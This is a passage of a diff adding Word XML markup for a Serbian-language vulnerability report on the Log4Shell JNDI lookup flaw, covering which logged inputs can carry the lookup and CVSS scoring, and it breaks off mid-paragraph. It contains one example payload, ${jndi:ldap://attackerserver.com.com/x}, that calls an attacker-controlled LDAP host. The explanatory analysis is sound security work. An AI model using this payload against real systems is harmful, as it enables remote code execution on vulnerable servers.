+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vrednost</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>java:comp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>/env/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Medutim</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ako</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>kljuc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sadrzi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> “:”, ne </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dodaje</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> se prefix. U </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ovom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>slucaju</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ako</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> se </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>prosledi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> LDAP string pre </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>ldap://localhost:3xx/o</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">I, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nece</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> se </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dodati</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> prefix, I LDAP server se </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>zaposli</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> da </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vrati</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objekat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Napadac</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>moze</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> da </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nadje</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ulaz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> koji se </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cuva</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> u </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>logovima</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> I </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>uradi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>evaluaciju</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>npr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>${</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>jndi:ldap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>://attackerserver.com.com/x</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. Ovo </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dozvoljava</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>napadacu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> da </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vrati</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objekat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>iz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>udaljenog</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> LDAP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>servera</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> koji </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>kontrolise</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> I </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pokrene</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>kod</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Ulaz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>moze</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> da </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>bude</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> HTTP header </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>kao</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> User-Agent koji se </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>obicno</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>loguje</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Moze da </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>bude</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> I parameter </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>forme</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>kao</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> username/request </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objekat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, koji </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>takodje</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>moze</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> da </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>bude</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>logovan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>na</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>neki</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nacin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:pict w14:anchorId="0FDFE6FF">
+          <v:rect id="_x0000_i1031" style="width:468pt;height:1.2pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2. CVSS </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>skor</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">CVSS </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>skor</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>numerička</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>vrednost</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">): </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>10</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Vektor: CVSS:3.0/</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>AV:N</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>AC:L</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>PR:N</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>UI:N</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>/S:C/C:H/I:H/A:H</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>AV:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>N</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>napada</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t xml:space="preserve">č može biti </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>bilo ko sa interneta</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>AC:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>L</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>složenost</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>napada</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> je low, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>što</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>znači</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> da </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>napadač</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>može</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> da </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>očekuje</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>svaki</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> put </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>uspešan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>napad</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>na</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ranjivu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>komponentu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>PR:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>N</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>privilegije</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>napadača</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>su</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>none</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Napadač</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>mo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>že da bude i potpuno neautorizovan korisnik</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>UI:N</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
